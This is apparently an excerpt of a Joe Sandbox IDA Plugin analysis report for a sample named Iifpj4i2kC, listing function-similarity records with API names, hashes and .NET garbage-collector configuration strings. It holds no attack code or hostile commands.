                                                                                                                                                                        • Opcode ID: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
                                                                                                                                                                        • Instruction ID: 9f87c06e27b8ad9ce12e7f1fe5a86851d727ea6daf986bd16fbdcb80fbdaf666
                                                                                                                                                                        • Opcode Fuzzy Hash: c142b665c17b9829f30997f3f45fa6cc62ef321f650404eeabfbf3fa27cb0e2d
                                                                                                                                                                        • Instruction Fuzzy Hash: BAE0C235F2610186EB189713A841A2523517F4BF00FC48038C40E87350DE2DA19BCB80
                                                                                                                                                                        APIs
                                                                                                                                                                        • CoInitializeEx.OLE32(?,?,?,?,00000030,?,?,?,?,?,?,?,00007FF67FAE27CF,?,?,00000030), ref: 00007FF67FAE28E2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                        • Opcode ID: 803ee097a5861c941b8cfd7976f9223188b032406d6128dfb8400f5b6217b5c5
                                                                                                                                                                        • Instruction ID: a517e1c14a7d8d2140319cd08f652e70fe9dec503c1a420b794a3388c7d693aa
                                                                                                                                                                        • Opcode Fuzzy Hash: 803ee097a5861c941b8cfd7976f9223188b032406d6128dfb8400f5b6217b5c5
                                                                                                                                                                        • Instruction Fuzzy Hash: 29218617F68202D4F711E6669D52EFD13E06F54758F644039EE0D86686EE2CE8428280
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
                                                                                                                                                                        • Instruction ID: d577e4ce92b98f7223e4df1249cc0e71badbfa184c13507af97991cf2eff0577
                                                                                                                                                                        • Opcode Fuzzy Hash: 3b1958921fa04c35c2a701cc9646c22b7e924147385864a8d091c62de11b65c9
                                                                                                                                                                        • Instruction Fuzzy Hash: 47117563F3874582E6508A21A401EB553A5AB997B0F185331EE6DA37C6EF2CD582C7C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentExceptionFailFastQueryRaiseThreadVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2131581837-0
                                                                                                                                                                        • Opcode ID: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
                                                                                                                                                                        • Instruction ID: 766575703f8f4630c072212c861b137b3e3ae49186a44f0a7bcd6535ce5a0a6b
                                                                                                                                                                        • Opcode Fuzzy Hash: d896b62f651088d1b42081c4ab7746b0ce5873f34015609dc32dcd43e3b187cf
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C115E33918782C2DB249F29B4015AAB3A1FB457B0F144339E6BD877D6DF38D0468780
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Event
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4201588131-0
                                                                                                                                                                        • Opcode ID: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
                                                                                                                                                                        • Instruction ID: 7f09707a8b2722dac515d53784980d94f9f0233b6e310795387ecc4f23af7328
                                                                                                                                                                        • Opcode Fuzzy Hash: 452514a172d171043efb9d9a11994c3fb97cdc7e94a50651428492a93767d4e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 7DF08217F38642C2E640A725B982ABA13919F49BA0F545130ED1D87797CE3CE0818BC0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                        • Opcode ID: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
                                                                                                                                                                        • Instruction ID: 767ec36274ecc4a29d80606ba28c24db61222633d8f44e25942b2b327c9cdd65
                                                                                                                                                                        • Opcode Fuzzy Hash: e0e6f915b3e62b249a019bbc0d8d3fcc09be6c9d174bfcd050118d8529439d8d
                                                                                                                                                                        • Instruction Fuzzy Hash: F4B01200F26041C2E3042723BC4270802193B07F02FC04064D708F2290CD1C81E50B00
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$BreakOnOOM$CompactRatio$ConcurrentGC$ConfigLogEnabled$ConfigLogFile$ConservativeGC$ForceCompact$GCConfigLogFile$GCConserveMem$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapAffinitizeRanges$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLargePages$GCLogFile$GCLowSkipRatio$GCName$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCSpinCountUnit$GCTotalPhysicalMemory$Gen0Size$HeapCount$HeapVerifyLevel$LOHCompactionMode$LOHThreshold$LatencyLevel$LatencyMode$LogEnabled$LogFile$LogFileSize$MaxHeapCount$NoAffinitize$RetainVM$SegmentSize$ServerGC$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapAffinitizeRanges$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.Name$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server
                                                                                                                                                                        • API String ID: 0-799405152
                                                                                                                                                                        • Opcode ID: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
                                                                                                                                                                        • Instruction ID: 15769f63340ae6906198b994cbff7d468393478a04df4aa9f8b9d8b5f3d8966e
                                                                                                                                                                        • Opcode Fuzzy Hash: 1ebbd9bada395e0ae796c2d8dd3961aa3f840e2442c0f16195dfd22ce20a116f
                                                                                                                                                                        • Instruction Fuzzy Hash: 44426176628A9781EB609B55F810EAA63A4FF86FD8F415132D98C47F24DF3CD205CB84
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcmp
                                                                                                                                                                        • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                                                                                                                                        • API String ID: 1004003707-1294421646
                                                                                                                                                                        • Opcode ID: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
                                                                                                                                                                        • Instruction ID: c6577823c85a3572753d0965b1828cc2b9c4f973e4f32d8afd2e84ada17c91b2
                                                                                                                                                                        • Opcode Fuzzy Hash: 8dd0dd815cfb6f9141113c6627f02b0dffcd85473cd5b48b1167f53c38f69273
                                                                                                                                                                        • Instruction Fuzzy Hash: E262B066D3DA8794FA00DB59AC408B327A1BF96F94B844236C48DD7272EE7CE159C7C0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 456121617-0
                                                                                                                                                                        • Opcode ID: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
                                                                                                                                                                        • Instruction ID: 046fe560e6abc1796ae780e1f68e9efd2d00ccfa7407ecafbe86f7dada7eda03
                                                                                                                                                                        • Opcode Fuzzy Hash: f3eca593082eef418b28c3d3d3ba6008102fd1d88324591edaa9422849b7c77f
                                                                                                                                                                        • Instruction Fuzzy Hash: 78729C63A296C2C2EA628B15D040BB967E0FF45BA4F184635DE5D877D5DFBCE480C780
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                                                                                                                                        • String ID: SeLockMemoryPrivilege
                                                                                                                                                                        • API String ID: 1752251271-475654710
                                                                                                                                                                        • Opcode ID: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
                                                                                                                                                                        • Instruction ID: 72f241207d3518de34b19bccb4b902aa8f295b2b9019e991188fd648378fb91a
                                                                                                                                                                        • Opcode Fuzzy Hash: a64ce78d6ed104d2b6db937a96794cdf395e2d8bd2e23d037bc090c5da09f6ca
                                                                                                                                                                        • Instruction Fuzzy Hash: 48318127A2C742C6FB209B61F414B7A67A5EF85B98F044035EA8D97754DE3CD4888B80
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SwitchThread$BreakCounterDebugPerformanceQuery
                                                                                                                                                                        • String ID: GCHeap::Promote: Promote GC Root *%p = %p MT = %pT$Concurrent GC: Restarting EE
                                                                                                                                                                        • API String ID: 30421299-2108734148
                                                                                                                                                                        • Opcode ID: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
                                                                                                                                                                        • Instruction ID: 67f4ecd1e61702bcd832cf7688f74bc62b44ed1d9477449a71696af2362ab605
                                                                                                                                                                        • Opcode Fuzzy Hash: 6615c7b4db84cdefcc6dfb6fb544c900babefb5ec8c8e420ffc49294f2f83981
                                                                                                                                                                        • Instruction Fuzzy Hash: 55C2C063A29743C5FA558B29E450B7A27A4BF45B98F184236DE5DC37A1EF3CE481C380
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: SwitchThread$BreakDebug
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 223621376-0
                                                                                                                                                                        • Opcode ID: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
                                                                                                                                                                        • Instruction ID: c5b1197432315295f5efff5bb491e7d8e073d76ce3f3e8b85b46ab5645f93dc4
                                                                                                                                                                        • Opcode Fuzzy Hash: e5cb054ff7b66c56e3d29fbfe9d471ef182207bf6629e1d95f516b43b2c9ee66
                                                                                                                                                                        • Instruction Fuzzy Hash: 47B25C33A28646C5FA648B299440B7A2BE4BF56FA4F145235E95DC77E1EF3CE480C380
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BreakDebug$CriticalSection$EnterLeave
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3888577265-0
                                                                                                                                                                        • Opcode ID: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
                                                                                                                                                                        • Instruction ID: cc2f6e140c590855f2d0561bf4764b8fe7d3892b2bb8a008c93143c3a1aea040
                                                                                                                                                                        • Opcode Fuzzy Hash: d86f80d7bffd3d43e5ca74b6d9e1eaf02e16cc952f2289a23396a127ac85969b
                                                                                                                                                                        • Instruction Fuzzy Hash: 0712A923A39B87C1EA618B15E450F7A27A0FF85B88F244135DA5D97399DF3CE580C2E0
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
